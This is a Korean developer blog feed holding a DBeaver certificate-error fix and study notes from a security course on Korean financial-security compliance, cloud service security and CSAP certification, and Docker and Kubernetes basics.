p-jina.log

[DBeaver] Network unavailable due to a certificate issue. 해결방법

Sun, 14 Apr 2024 15:23:23 GMT

에러 메세지

Network unavailable due to a certificate issue. Try changinh the setting 'Use Windows trust store' in Preferences->Connections and restart DBeaver. It might help if you haven't overridden the trust store. javax.net.ssl.SSLHandshakeException:PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException:unable to find valid certifiation path to requested target.

해결방법

파일 > 설정 > Global settings

연결 > Use Windows trust store 체크 해제 > Apply and Close

DBeaver 종료 후 다시 실행 시 정상적으로 드라이버를 다운받는 걸 확인할 수 있다.

[SK shieldus Rookies 16기][클라우드 보안 컨설팅 실무] 금융보안

Thu, 25 Jan 2024 04:27:23 GMT

1. 보안동향

Financial Policy 디지털 금융 정책 :
- 자율보안체계
- 탄력성, 사이버 복원력
- 클라우드 마이그레이션
Security Threat 보안 위협 :
- 공격채널 다양화, 하이브리드 위협
- SW 공급망 공격
- SBOM의 중요성
- 피싱범죄에 딥페이크 기술 악용
IT Innovation IT 혁신 :
- 디지털 지갑
- AI 안전성, 신뢰성 확보
- 사물인터넷(IoT) + 디지털 금융 = 금융사물인터넷(FoT)

2. 법률 동향

금융권 정보보호 정책/지침 문서체계

법령 :
- 전자금융 거래법 - 동법 시행령
- 신용정보법
- 금융실명법(은행/증권 등)
- 여신전문금융업법(카드)
- 보험업법(보험)
행정규칙 :
- 전자금융감독규정 - 동 규정 시행세칙
  - 행정지도 : 금융회사 정보기술(IT) 부문 보호 업무 이행지침
사규 :
- 규정
- 지침
- 매뉴얼
- 가이드
- 전산정보 업무규정
- 전산정보보안업무지침
- 매뉴얼 제5편 제1장 정보보안
- PC 보안관리 가이드

2.1. 법규/컴플라이언스 상의 취약점 분석평가 강제 조항

전자금융 기반시설 :
- *정보통신기반 보호법 *제9조(취약점 분석·평가)
- 전자금융거래법 제21조의3(전자금융기반시설의 취약점 분석·평가)
- 전자금융감독규정 제37조의2(전자금융기반시설의 취약점 분석평가 주기, 내용 등)
정보보호 관리체계 :
- 정보통신망 이용촉진 및 정보보호 등에 관한 법률 제47조(정보보호 관리체계의 인증)
- 동법 시행령 제49조(정보보호 관리체계 인증 대상자의 범위)
- 정보보호관리체계 인증에 관한 고시 제14조(인증 의무대상자 범위)
정보보호관리체계 ISO27001 :
- 인증 규격 상의 8.2정보보호 위험 평가
정보보호 권고사항(망법) :
- 정보보호조치에 관한 지침(방통위고시 제2013-3호)
개인정보보호법 :
- 법 제29조(안전조치의무)
- 개인정보의 안전성 확보조치 기준 제5조(접근통제)
- PMS 9.22 기술적 점검 > 기술적 보안점검 정기 수행

3. 보안취약점 분석평가

3.1. 정의

전자금융기반시설에 안전성과 신뢰성을 저해하는 사이버 위협에 대응하기 위해 잠재된 보안 위협을 찾고 이를 개선하기 위한 사전 예방 활동을 의미

3.2. 평가 대상

금융회사 및 전자금융업자는 관계 법령에서 정한 내용에 따라 전자금융업무를 처리하기 위한 정보처리시스템 대상으로 취약점을 분석하고 평가함

3.3. 평가 주기

공개 홈페이지 연2회 이상
전자금융기반시설 연1회 이상

3.4. 분석평가 방법

취약점 평가 수행 시 금융회사가 자체전담반을 구성하여 운영하는 방안과 외부 평가 전문기관에 위탁하는 방안으로 구분

금융회사가 자체전담반을 구성하여 운영하는 방안
금융회사가 평가전문기관에 위탁하는 방안

3.5. 분석평가 절차

사전 분석 : 평가계획 수립 및 업무 현황 파악등
취약점 분석 : 자산분석, 취약점 분석 등
취약점 평가 : 전보보호분석·평가 지구 산출 등의 종합평가
대책 수립 : 발견된 취약점에 대한 보안대책 수립 등
사후 평가 : 발견된 취약점에 대한 조치계획 수립 등

SK 쉴더스에서 하는 보안취약점 분석평가 절차

요구 분석
범위 선정
자산 분석
위협 분석
취약성 분석
기존대책 분석
위험 평가
개선대책 권고
개선이행 점검 ⇒ 금융회사 보안 취약점 분석 · 평가 결과 보고서 작성

결과보고서 및 보완조치 이행계획서를 분석평가 종료 후 30일 이내 금융감독원에 제출하여야 한다.

3.6. 분석평가 기준

전자금융기반시설 보안 취약점 평가기준은 「금융 IT 보안 컴플라이언스 가이드」 (2017.10, 금융보안원) 를 준용하여 11개 통제분야 및 280개 세부항목으로 구성

4. 금융 회사 · 기관 분류

은행
- 일반은행
- 특수은행
비은행예금취급기관
- 종합금융회사
- 상호저축은행
- 신용협동기구
- 우체국 예금
증권회사, 자산운용회사
- 증권회사
- 자산운용회사
- 산물회사
- 증권금융회사
- 투자자문화사
보험회사
- 생명보험회사
- 손해보험회사
- 우체국보험
- 공제기관
- 한국수출보험공사
기타 금융회사
- 여신전문금융회사
- 벤처캐피탈회사
- 신탁회사
금융 보조기관
- 금융감독원
- 예금보험공사
- 금융결제원
- 신용보증기관
- 신용평가회사
- 한국자산관리공사
- 한국주택금융공사
- 한국거래소
- 자금중개회사

5. 환경적 보안

물리적 환경적 보안
- 전산실 보안
관리/물리영역
- 단말기 보호대책
- 전산자료 보호대책
- 악성코드 감염 방지대책
- 공개 서버 보안
- IP주소 관리
- 암호 프로그램 및 암호키 관리
- 취약점 분석 · 평가
- 계정 및 권한 관리
- 정보처리시스템 관리자 통제
- 내부사용자 비밀번호 관리
- 이용자 비밀번호 관리
- 일괄작업 통제
- 업무 지속성 확보 방안
- 위기대응 행동 메뉴얼 수립
- 전자금융거래 시 준수사항
- 이용자 정보보호
- 외부주문 계약 준수사항
- 외부주문 시 보호 대책
- 외부주문 등에 대한 기준
- 침해사고 대응
- 정보기술 부문 및 전자금융 사고보고
- 손해배상
- 정보기술부문 및 전자금융 사고보고

6. 보안컨설팅 사업

6.1. 사업 유형 분류

대중성 :
- 트렌드 및 이슈, 전통성에 의거한 분류
- 보안 컨설팅 기업의 일반적 분류법
컴플라이언스 :
- 법적인 강제성 보유 유무에 의한 분류
정형 vs 비정형 :
- 평가/점검 기준이 존재, 산출 문서가 틍정되어 있음.
- 경우에 따라 결과보고서 포맷이 정해져 있음.
- 과거 산출물을 참고하여 작성
- 일반적인 분류 기준이 아닌 의미상의 분류
신기술영역, 융합보안영역 :
- 특정 신기술 영역 여부에 의한 분류
- 재조명된 영역 여부

6.2. 컨설팅 유형

보안시스템 도입/구축 컨설팅
보안시스템 운영 컴플라이언스 준수 점검 컨설팅
보안시스템 운영관리 수준 점검 컨설팅
보안시스템 아키텍처 수립 컨설팅
보안시스템별 심화 모의해킹

6.3. 보안컨설턴트 vs 아키텍트

People
Process
Technology

7. 정보보호 컨설팅 방법론(ISCM)

ISCM (Infosec Security Consulting Methodology)은 금융, 통신, 제조, 공공 등 각 사업 분야에서 다년간 검증된 방법론

7.1. 수행절차

환경분석
현황분석
위험평가
보호대책수립
조치지원

8. 현황 분석

8.1. IT 인프라 취약점 점검 - 수행절차

사전준비
취약점 점검 수행
취약점 분석 및 조치지원
개선안 수립

8.2. 정보보호관리체계 평가 기준

관리적 보안
1. 정보보호 정책
2. 정보보호 조직
3. 인적 보안
4. 업무 지속성 관리
5. 외부주문 보안
기술적 보안
1. 운영관리
2. 접근통제
3. IT 도입 · 개발 · 유지보수 관리
4. 전자금융거래 보안
5. 보안사고 대응
물리적 보안
1. 물리적 · 환경적 보안

9. 위험분석 및 평가

9.1. 위험분석 평가 절차

자산 분석 : CIA 기준으로 자산별 중요도 산정
위협 분석 : 위협 시나리오 기반으로 위협 유형 정의 및 평가
취약성 분석 : 취약성 평가
위험도 분석 : 위헙도 산정 및 평가
- 공통관리 위험
- 접근 경로별 위험
- 단위 시스템별 위험
보호대책 수립 : 조치이행에 따른 증적 수집

10. 개인정보보호법 주요 개정사항

개인정보 전송요구권 :
- 정보주체는 자신 또는 다른 개인정보처리자에게 개인정보 전송을 요구할 수 있음
- 개인정보보호법 제35조의2(개인정보의 전송 요구)
*자동화된 결정 대응권 : *
- 정보주체는 자동화된 시스템으로 이루어지는 결정에 대해 거부 및 설명 요구 가능
- 개인정보보호법 제37조의2(자동화된 결정에 대한 정보주체의 권리 등)
국외 이전 중지 명령 :
- 개인정보 국외 이전으로 정보주체의 피해가 우려 시 국외 이전 중지 명령 가능
  - 개인정보보호법 제28조의9(개인정보의 국외 이전 중지 명령)
*개인정보 처리방침 평가 : *
- 보호위원회는 개인정보 처리방침을 평가하고, 개선 권고 가능
- 개인정보보호법 제30조의2(개인정보 처리방침의 평가 및 개선권고)
재위탁 공개 및 동의 의무 :
- 위탁사는 수탁사가 재위탁 시 공개하고, 수탁사는 최초 위탁자의 동의를 받아야 함
- 개인정보보호법 제26조(업무위탁에 따른 개인정보 처리제한)
민감정보 위험 고지 :
- 민감정보가 공개될 위험이 있는 경우 공개 가능성 및 비공개 선택 방법을 알려야함
- 개인정보보호법 제23조(민감정보의 처리제한)
이동형 영상정보 처리기기 :
- 이동형 영상정보처리기기 운영 요건 정의
- 개인정보보호법 제25조의2(이동형 영상 정보처리기기의 운영제한)
사전 실태점검 :
- 침해사고 고위험, 취약점 점검이 필요한 개인정보처리자 대상 사전 실태점검 가능
- 개인정보보호법 제63조의2(사전 실태점검)

10.1. 개인정보보호법 제26조에 따른 재위탁 제한에 관한 법률

개인정보보호법 제19조(개인정보를 제공받은 자의 이용,제공 제한)
개인정보보호법 제26조(업무 위탁에 따른 개인정보의 처리제한) 제 5항
개인정보보호법 제26조(업무 위탁에 따른 개인정보의 처리 제한) 제6항

[SK shieldus Rookies 16기][클라우드 보안 컨설팅 실무] 클라우드 컴퓨팅서비스 보안

Tue, 23 Jan 2024 09:13:40 GMT

1. DeSecOps 프로세스별 보안 역할

보안 설계 및 아키텍처 :
- DevOps를 이용하는 소프트웨어 개발 :
  - 솔루션 아키텍트
- 보안 활동 :
  1. 위협 모델링
  2. 보안 사용자 트로기 값 스트림 보안 매핑
  3. 위험 요소 도출
  4. 아키텍처 원칙 및 아티팩트
보안코딩
- DevOps를 이용하는 소프트웨어 개발 :
  - 클라우드 개발자
  - 운영 엔지니어
  - 소프트웨어 개발자
- 보안 활동 :
  1. 개발자 교육
  2. 보안 Hook
  3. 소스코드 오류 분석
  4. SCA(소프트웨어 구성 분석)
  5. 컨테이너 보안강화
  6. 보안단위 테스트
  7. IaC(인프라형 코드 분석)
지속적 빌드, 통합 및 테스트
- 보안 활동 중 모의해킹 진단
  - 민간기업, 공공기관 대상 : 과학기술정보통신부고시 주요정보통신기반시설 취약점 분석평가 가이드 > 웹(Web) 점검 항목 28개
  - 금융회사, 전자금융업자 대상 : 금융위원회 전자금융기반시설 취약점 분석평가 기준(매년 갱신 : 금융보안원) > 웹(Web) 점검항목
지속적 전달 및 배포
런타임 보호 및 모니터링

2. 단일 테넌트 vs 멀티 테넌트

단일 테넌트(Single Tenant) :
- 단일 고객에게 독립적인 애플리케이션과 데이터베이스를 제공하는 방식
- 격리된 배포 접근 방식으로 보안성 ↑
멀티 테넌트(Multi Tenant) :
- 여러 고객에게 하나의 애플리케이션과 하나의 데이터베이스를 공유해서 사용하는 방식
- 공유 배포 접근 방식으로 보안성 ↓

단일 테넌트와 멀티 테넌트의 장단점을 합쳐 가장 많이 쓰고 있는 방식이 여러 고객에게 하나의 애플리케이션과 각각의 데이터베이스를 제공하는 방식을 채택하고 있음.

3. 프로비저닝(Provisioning)

3.1. 정의

사용자의 요구에 맞게 시스템 자원을 할당, 배치, 배포해두었다가 필요 시 시스템을 즉시 사용할 수 있는 상태로 미리 준비해두는 것

3.2. 종류

서버 자원 프로비저닝(Server Resource Provisioning) :
- IaaS에 따른 가상 서버의 프로비저닝
운영체제 프로비저닝(OS Provisioning)
소프트웨어 프로비저닝(Software Provisioning)
계정 프로비저닝(Account Provisioning)
스토리지 프로비저닝(Storage Provisioning) :
- Block, Object, File 형 저장소를 제공

4. VPC(Virtual Private Cloud)

4.1. 정의

가상 사설 클라우드
가상 네트워크 서비스
- 인터넷게이트웨이
- 온프레미스에서 라우터 역할

4.2. 가상 방화벽

3 Layer 로 이루어져 있음 1차적으로 내외부망을 차단하는 역할

NACL(네트워크 접근통제 목록)
- 기본적으로 Stateless(비저장방식) 방식으로 함
Security Group(SG) :
- 인스턴스 수준에서 동작하는 가상 방화벽
- 인스턴스에 대한 인바운드, 아웃바운드 트래픽 제어

4.3. VPC간 통신 방식

VGW(Virtual Private Gateway) :
- VPC-온프레미스 네트워크 간의 VPN 연결을 가능하게 함
- VPC와 온프레미스 네트워크 간에 안전한 연결이 필요한 경우 사용
- 동일 리전의 동일 계정에 있는 여러 VPC가 연결하는 경우
- 엔드포인트 방식
DGW(Direct Connect Gateway) :
- AWS Direct Connect를 사용하여 VPC-온프레미스 네트워크 연결
- 높은 대역폭과 일관된 네트워크 성능이 필요한 경우 사용
TGW(Transit Gateway) :
- VPC-온프레미스 네트워크 간의 트래픽에 대한 리전별 가상 라우터 역할을 수행
- 서로 다른 리전, 서로 다른 계정간 다수의 VPC를 연결할 경우 사용

4.4. VPC Peerging 방식

VPC 간 1대1로 직접적인 연결을 제공하는 기능

5. DMZ, Private 구조

VRF(Virtual Routing and Forwarding) :
- 하나의 라우터를 여러 개 가상 라우팅 도메인으로 나누어 하나의 물리적 네트워크를 여러 개 프로토콜을 가진 논리적 네트워크로 구성하는 네트워크 가상화를 제공하는 기술
DMZ-WAS를 가장 많이 사용하고 있음

6. Shared Security Responsibility Model(SSRM)

공동 보안 책임 모델 고객은 클라우드 내부 보안을 책임지고, AWS는 클라우드 자체의 보안을 책임

7. 클라우드 컴퓨팅 보안 위협 요소

7.1. 가상환경

보안위협 :
1. 악성 코드 감염
2. SaaS 애플리케이션 취약점
3. 인터페이스 및 API 취약점
4. 가상 자원 격리 위협
5. 개발, 운영 가상환경 비인가 접근
6. App 데이터 변조
보안 속성 :
- 기밀성
- 무결성
  7.2. 클라우드 인프라
보안위협 :
- 설비 : 물리적 위협(화재, 정전 등)
- 하드웨어 :
  1. QoS
  2. DDoS
  3. Flood Attack
  4. 네트워크 장비 설정 오류
- 가상화 인프라 :
  1. Multi-Tenancy(다중 임차)
  2. 공유 위협
  3. 솔루션 설정 오류
보안 속성 :
- 기밀성
- 무결성
  7.3. 정책
보안위협 :
- 규정/법 미준수
- 인적보안
- SLA 위반
- 용역 관리
보안 속성 :
- 감사
  7.4. 사고 및 장애 대응
보안위협 :
- 동일 사고 재발생
- 백업/복원 실패
- 사고 후 운영 실패
보안 속성 :
- 가용성
  7.5. 인증 및 권한
보안위협 :
- 계정 탈취
- 내부자 위협
- 권한 상승/오용
- 단말 보안
보안 속성 :
- 인증 · 권한
  7.6. 데이터
보안위협 :
1. 데이터 유출
2. 데이터 파괴
3. 데이터 위치(사법관할권)
  - 국가 · 공공기관 :
    1. 고유식별정보, 기관에 비밀 데이터 등록 시 클라우드의 리전은 대한민국 내에 존재해야 함
    2. Cloud Service Deploy Model 은 반드시 프라이빗 클라우드로 구축해야함
  - 금융회사, 전자금융업자 :
    - 도입한 클라우드 컴퓨팅 서비스 내에 중요정보(고유식별정보, 개인신용정보(계좌번호, 신용카드번호, 보험증권번호))는 대한민국 리전에 존재해야 함
4. 데이터 안전성(백업 및 복원)
보안 속성 :
- 기밀성
- 무결성

8. 클라우드컴퓨팅서비스 보안운영 아키텍처

클라우드서비스 보안 계층 구분 :
1. 클라우드 사용자 보안 계층 :
  - 클라우드서비스 정보보호 정책·조직
  - 인적보안
  - 클라우드 서비스 자산관리
  - 준거성
  - 데이터 보호 및 암호화
  - 개인식별정보(PII) 보호
2. 서비스 제공자 보안 계층 :
  - 사용자 접근 통제
  - 서비스 공급망 관리
  - 침해사고 관리
  - 서비스 연속성 관리
  - 시스템 개발 및 도입 보안
3. 가상머신 및 컨테이너 보안 계층 :
  - 가상화 보안
  - 가상 네트워크 보안
  - 클라우드컴퓨팅시스템 접근 통제
4. 데이터센터 보안 계층 :
  - 클라우드 물리적 보안
  - 물리적 네트워크 보안
클라우드서비스 취약점 점검 및 보안통제평가 :
- 클라우드서비스 취약점 점검
- 클라우드서비스 보안통제평가
클라우드컴퓨팅서비스 위험관리 :
- 클라우드컴퓨팅서비스 위험평가 및 위험조치계획
- 클라우드컴퓨팅서비스 위험관리 프로세스
국가기관 등의 보안요구사항 :
- 공공기관 클라우드 관리적 보호조치
- 공공기관 클라우드 물리적 보호조치
- 공공기관 클라우드 기술적 보호조치

9. 데이터 보안 생명주기 6단계

국제산업표준 CSA(Cloud Security Alliance)

생성(Create)
저장(Store)
이용(Use)
공유(Share)
보관(Archive)
파기(Destroy)

9.1. 기능별 데이터 생명주기 단계별 매핑표

Read (읽기) : 데이터 생성, 보기, 읽기, 복사, 전송,배포
Process (프로세스) : 데이터에 대한 트랜잭션 수행, 업데이트
Store (저장) : 데이터 보관(파일, DB 등)

10. 클라우드 보안 문서체계

11. 클라우드 개인정보보호 분야

클라우드 간 신뢰 관리 보안
클라우드 기반 개인정보보호 정책, 접근 통제, 권한관리
ABE(Attribute-Based Encryption:속성기반암호화), KP-ABE(Key-policy ABE), CP-ABE(Ciphertext-Policy ABE)
책임추적성, 개인정보 식별, 인증
데이터 암호화, 안전한 클라우드 통신
RBAC(역할기반접근통제), ABAC(속성기반접근통제), 개인정보업무 통제, 클라우드 기반 개인정보 흐름 통제
기밀성, 무결성, 가용성
클라우드 기반 개인정보 위험관리
개인정보처리시스템 장애 대응, 개인정보처리 성능 품질관리
취약점 분석평가, 보안 감사, 디지털 포렌식

12. 클라우드 접근 인프라스트럭처

12.1. 기본보안 구성요소

SDP (Software Defined Perimeter, 소프트웨어 정의 경계) :
- 인터넷에 연결된 인프라(서버, 라우터 등)를 숨기는 방법
- 하드웨어 대신 소프트웨어를 기반으로 네트워크 경계를 설정하기 위함
SDN (Software Defined Networking) :
- 네트워크 리소스 최적화
- 네트워크 가상화 및 컨테이너화에 대한 접근 방식
SD-WAN (Software Defined WAN) :
- 네트워크 하드웨어에서 트래픽 관리 및 모니터링 가상화하여 개별 애플리케이션에 적용
NSaaS (Network Security as a Service, 네트워크 보안형 서비스) :
- 관리형 보안 서비스 제공업체가 운영하는 클라우드 솔루션
- 클라이언트 네트워크 경계에 설치된 모든 보안 솔루션을 제어, 관리

12.2. 접근통제

SWG (Secure Web Gateway) :
RBI (Remote browser isolation) :
CASB (Cloud Access Security Broker) :
ZTNA (Zero Trust Net Access) :

12.3. 식별 및 인증

MFA (Multi Factor Authentication) :
Biometric Auth (생체인식) :
ZKP (Zero Know Proof, 제로 알려진 증명) :
Credentials Persistency (자격증명 지속성) :
IAM (Identity Access Management, 계정식별 접근관리) :
ZTA (Zero Trust Architecture, 제로 신뢰 기반구조) :

13. CSAP 인증제도

13.1 .인증 개요

국가 · 공공기관에서 안전성 및 신뢰성이 검증된 민간 클라우드 서비스 공급
클라우드 보안인증 평가로 미흡할 수 있었던 컴플라이언스 점검을 통해 법적 준거성을 확보하여 이용자의 신뢰도 향상

13.2. CSAP 인증 클라우드 보안컨설팅 수행 프로세스

신청 기관은 CSAP 인증을 받고자 하는 기업 평가기관은 KISA

환경분석 및 정보수집
- CSAP 인증범위 정의
  - SaaS간편/표준 인증범위
  - IaaS/DaaS 인증범위
  - 클라우드 기반 업무, 조직 등
- CSAP 통제사항 사전질의서 작성 및 배포
GAP 분석
- CSAP 보안통제평가 기준
  - SaaS 간편 : 31개 항목 적용
  - SaaS 표준 : 79개 항목 적용
  - IaaS : 116개 항목 적용
  - DaaS : 110개 항목 적용
클라우드 보호대책 수립
- 클라우드서비스 준거성 검토
- 클라우드서비스 보안감사
  - SaaS 간편 해당사항 X
- 클라우드서비스 정보보호 정보지침 검토 또는 작성 지원
인증준비 구현
- 클라우드서비스 보안인증 명세서
- 클라우드서비스 보안운영 명세서
  - SaaS 간편 : 22개 항목 적용
  - PaaS 표준 : 70개 항목 적용
  - IaaS : 116개 항목 적용
    13.3. 인증신청 시 제출문서
클라우드서비스 보안인증 신청공문 1부
클라우드서비스 보안인증 신청서 1부
클라우드서비스 보안인증 명세서 1부(클라우드서비스 보안 운영 명세서 포함)
취약점 점검 및 침투 테스트 동의서 1부(SaaS는 IaaS 사업자의 동의포함)
법인/개인 사업자등록증 1부
보안기능변경 영향분석서(CC인증 제품군 SECaaS만해당)
자산관리대장

13.4. 관련 법령

클라우드컴퓨팅서비스 보안인증에 관한 고시 제14조(보안인증 유형 및 등급) 클라우드컴퓨팅서비스 보안인증에 관한 고시 제15조(보안인증기준)

13.5. CSAP 클라우드 보안인증 유형 결정방안

개발, 운영 인프라 환경
- PaaS : 컨테이너, 레지스터리
- SaaS
CSC(민간, 공공기관) 제공하는 클라우드컴퓨팅서비스 중 SW

💡 보안인증 결정은은 고객인 CSC가 한다.

13.6. 클라우드컴퓨팅서비스 위험관리 8단계 프로세스

정보자산 식별 및 정보자산 보안영향도 평가
위험 식별(각 분야별 취약점진단)
위험분석
위험평가
잔여위험 도출
위험수용관리 결정
위험 조치 계획 수립
위험 이행조치, 모니터링 및 검토

[SK shieldus Rookies 16기][클라우드 보안 컨설팅 실무] 하이퍼바이저, 가상화, 가상머신과 컨테이너, 쿠버네티스, 도커

Mon, 22 Jan 2024 04:32:26 GMT

1. 하이퍼바이저(Hypervisor)

1.1. 정의

호스트 컴퓨터에서 다수의 게스트 OS를 동시에 실행하기 위한 논리적 플랫폼
가상머신을 생성하고 구동하는 소프트웨어로 물리적 서버를 여러 가상 서버로 나눔.
Virtual Machine을 모니터링하는 중간 관리 VMM(Virtual Machine Monitor) 라고도 부름

1.2. 특징

주로 IaaS(Infrastructure as a Service) 모델에서 퍼블릭 클라우드 환경에서 사용

1.3. 종류

Type1 하이퍼바이저 : 베어메탈(Bare-metal) 기반
- 하드웨어 바로 위에서 설치되어 실행되는 방식
- 하드웨어를 제어하는 운영체제 역할과 가상머신들을 관리하는 역할을 담당
- gkemdnp
Type2 하이퍼바이저 : 호스트(Hosted) 기반
- 일반적으로 사용하는 가상화 방식
- 호스트 OS 위에 설치되어 실행되는 방식

2. 가상화 vs 클라우드 컴퓨팅

2.1. 가상화(Virtualization)

정의 : 기술
목적 : 한 대의 물리적 시스템 하드웨어(CPU, Disk, Network 등)를 논리적으로 분할하여 다수의 실행환경(테넌트)이 공유하여 자원을 효율적으로 사용할 수 있게 해주는 기술
용도 : 특정 용도의 패키징된 리소스를 특정 사용자에게 제공
설정 : 이미지 기반
비용 : CAPEX(자본 지출) ↑, OPEX(운영 비용) ↓
평균 수명 : 연 단위
확장성 : Scale Up 방식으로 확장
워크로드 : 스테이트풀(Stateful)
테넌시 : 싱글 테넌트(하나의 사용자만 소프트웨어 인스턴스나 서비스 사용 가능)

2.2. 클라우드 컴퓨팅(Cloud Computing)

정의 : 방식
목적 : 온디맨드 사용을 위한 가상 리소스 풀링과 자동화
용도 : 다양한 용도의 리소스를 사용자 그룹에게 제공
설정 : 템플릿 기반
비용 :
- 프라이빗 클라우드 : 높은 CAPEX(자본 지출), 낮은 OPEX(운영 비용)
  - 퍼블릭 클라우드 : 낮은 CAPEX(자본 지출), 높은 OPEX(운영 비용)
평균 수명 : 시간/월 단위
확장성 : Scale Out 방식으로 확장
워크로드 : 스테이트리스(Stateless)
테넌시 : 멀티 테넌트(여러 사용자가 동일한 소프트웨어 인스턴스나 서비스를 공유)

💡 워크로드란? 컴퓨팅 리소스와 시간의 양. 클라우드 리소스에서 실행되는 애플리케이션, 서비스, 컴퓨팅 또는 기능을 의미. 워크로드는 애플리케이션 및 애플리케이션과의 상호작용을 지원하는 프로세스와 리소스로 구성.

💡 워크로드 상태 Stateless와 Stateful

Stateless
- 클라이언트 요청을 처리하는 동안 어떠한 상태 정보도 저장 X
- 각각의 요청은 독립적으로 처리됨
- 서버는 클라이언트의 과거 상태를 추적 X
- 독립적이기 때문에 부하 분산 가능
Stateful
- 클라이언트의 상태 정보를 유지하고 저장
- 각각의 요청은 이전 요청과의 상태 의존성을 가짐
- 서버는 클라이언트의 상태를 지속적으로 추적
- 상태 공유, 세션 유지 등의 기능을 지원

3. 인스턴스

3.1. 정의

컴퓨팅 리소스에 대한 가상 엑세스를 인스턴스(Instance)라는 형태로 제공

3.2. 특징

확장성 :
- CPU, 메모리, 스토리지 및 네트워크 리소스를 특정 인스턴스로 늘려 클라우드 리소스를 수평적으로 조정할 수 있음
내결합성 :
- 백업을 위해 여러 중복 인스턴스를 사용하여 중복성을 만듦
- 데이터 처리와 같은 메모리 집약적인 워크로드를 관리하는데 유용

3.3. 종류

범용 목적 인스턴스(General Purpose)
컴퓨팅 최적화 인스턴스(Compute Optimized)
- 데이터 분석, 빠른 처리를 원하는 애플리케이션에 사용
메모리 최적화 인스턴스(Memory Optimized)
- 관계형/비관계형 데이터베이스에 사용
가속화된 컴퓨팅 인스턴스(Accelerated Computing)
- 동적/정적 그래픽 처리에 사용
스토리지 최적화 인스턴스(Storage Optimized)
- IOPS(Input/Output Operations Per Second) 속도를 위해 사용

4. 가상머신 vs 컨테이너

4.1. 가상머신(Virtual Machine)

정의 :
- 물리적 시스템 하드웨어(CPU, Disk, Network 등)와 동일한 기능을 제공하는 소프트웨어 컴퓨터로
장점 :
- 가상머신은 가상 하드웨어를 직접 제어할 수 있기 때문에 높은 수준의 자원 격리와 쿼터 제한을 수행할 수 있음
단점 :
- 대량의 메모리 必
- CPU 자원 경쟁에 따른 성능 저하
특징 :
- 하이퍼바이저 有

4.2. 컨테이너(Container)

정의 :
- 애플리케이션 코드와 이 애플리케이션을 실행하기 위한 라이브러리, 환경 설정 등을 하나로 묶어 패키징한 소프트웨어 실행 단위 ⇒ 애플리케이션보다 크거나 실행하는 데 필수적인 모든 파일이 컨테이너에 패키징되는 것은 아니고, 특정 작업을 수행하는 단일 기능(마이크로서비스)이 컨테이너에 패키징됨
장점 :
- 빠른 부팅
- 적은 메모리 사용량
단점 :
- 호스트 운영체제에 실행 환경이 묶임
특징 :
- 각각의 독립적인 실행환경(테넌트)를 가지고 있지만 호스트 운영체제의 리소스와 기능을 공유
- 하이퍼바이저 대신 컨테이너 엔진(ex. Docker) 有

💡 구성 레이어가 적을수록 부팅 시작이 빠르다.

5. 도커(docker)

5.1. 정의

항만에서 일하는 '부두 노동자'를 의미하는 말로 항만에서 규격화되어 있는 컨테이너를 옮기고, 관리하는 직업을 도커라고 함. 컴퓨팅에서 도커도 동일한 일을 함.
컨테이너 기반의 오픈소스 가상화 플랫폼

5.2. 구성요소

Docker API :
- TCP 소켓을 이용해 도커 엔진에 명령어를 이용하여 도커를 제어하기 위한 인터페이스
Docker CLI :
- 도커 엔진에 사용하는 명령어
```
# 컨테이너 생성
$ docker build
```
이미지 가져오기

$ docker pull

컨테이너 실행

$ docker run ```
Distribution :
- 도커 이미지를 저장하고 배포 기능을 가진 레지스터리
Orchestration :
- 컨테이너를 프로비저닝하고 관리하는 시스템
Volumes :
- 컨테이너에서 생성된 데이터를 영구적으로 보관하기 위해 사용하는 것으로 데이터를 보존하고 컨테이너 간에 파일 시스템을 쉽게 공유할 수 있게 해줌
Containerd :
- 소프트웨어의 실행에 필요한 모든 것을 포함하는 완전한 파일시스템
Docker Build(BuildKit) :
- 도커의 빌드 엔진으로 도커 파일의 빌드 단계를 해결하여 컨테이너 이미지나 다른 아티팩트 생성
Networking :
- 컨테이너가 서로 또는 비-도커 작업과 연결하고 통신할 수 있는 기능

5.3. 도커의 이미지

컨테이너를 생성하기 위한 설계도나 템플릿
이미지는 애플리케이션을 실행하는데 필요한 모든 것을 포함(운영체제, 애플리케이션 코드, 라이브러리, 환경변수 등)
한 번 생성된 이미지는 변경되지 않는 불변성을 갖고 있음
이미지를 바탕으로 여러 개 컨테이너 생성 가능

💡 프로비저닝이란? 컨테이너의 생성과 관리를 자동화하는 과정을 의미

6. 쿠버네티스(Kubernetes)

6.1. 정의

배의 조타수라는 그리스 단어에서 유래
2014년 구글에서 사용하던 컨테이너 오케스트레이션 시스템 보그를 오픈 소스 소프트웨어로 공개한 것
Kubernetes → K와 S 사이 8글자가 있어서 k8s 라고도 함

💡 AWS에서 쿠버네티스 관리형 서비스인 EKS 출시

6.2. 특징

선언적 API :
- 컨테이너가 어떤 상태이길 워하는지만 쿠버네티스에 설정하면 지속해서 컨테이너 상태를 체크한다. 그리고 컨테이너가 설정한 상태가 아니라면 그것에 맞춘다는 개념
사용 컴포넌트 구현 단순
워크로드 분리
어디서나 실행 가능
활성화된 커뮤니티

6.3. 클러스터 기본구성

클러스터 (Cluster) : 여러 대의 컴퓨터들이 연결되어 하나의 시스템처럼 동작하는 컴퓨터들의 집합
마스터 노드 (Master Node) : 클러스터를 관리
- kube-apiserver : 클러스터의 API를 사용할 수 있도록 하고, 클러스터에 들어온 요청을 가장 먼저 접수해 해당 요청이 유효한지 검증하는 역할을 하는 컴포넌트
- kube-contorller-manager : 클러스터의 전반적인 상태 관리 및 필요 조치를 취하는 컴포넌트
- kube-scheduler : 자원 할당이 가능한 노드에 포드를 배치하는 결정을 하는 역할로 이 결정은 kube-apiserver에 전달(바인딩)
- kube-proxy : 쿠버네티스는 클러스터 안에 별도의 가상 네트워크를 설정하고 관리하는데 이 가상 네트워크의 동작(네트워크 프록시, 네트워크 설정, 서비스 모니터링)을 관리하는 컴포넌트
- etcd : 모든 클러스터의 데이터를 키-값 형태로 저장하는 저장소로 일종의 데이터베이스
워커 노드 (Worker Node) : 실제 컨테이너를 실행시키는 노드
- kubelet : 워커 노드의 kubelet은 마스터의 kube-apiserver와 통신하면서 포드의 생성, 관리, 삭제를 담당
- Pod : 하나 이상의 컨테이너 그룹
  - container
- container runtime : 컨테이너를 실행시키는 엔진
- kube-proxy : 포드 간의 통신이 가능하게 해주는 컴포넌트

7. 컨테이너 보안이슈

컨테이너 애플리케이션 접근
컨테이너 이미지 보안
루트 권한으로 이용하는 컨테이너 동작
사용자 권한
포드 통신 구간 암호화
중요 데이터 보안
etcd 보안
컨테이너 데이터, 이미지 백업 및 복구
컨테이너 보안정책 구성
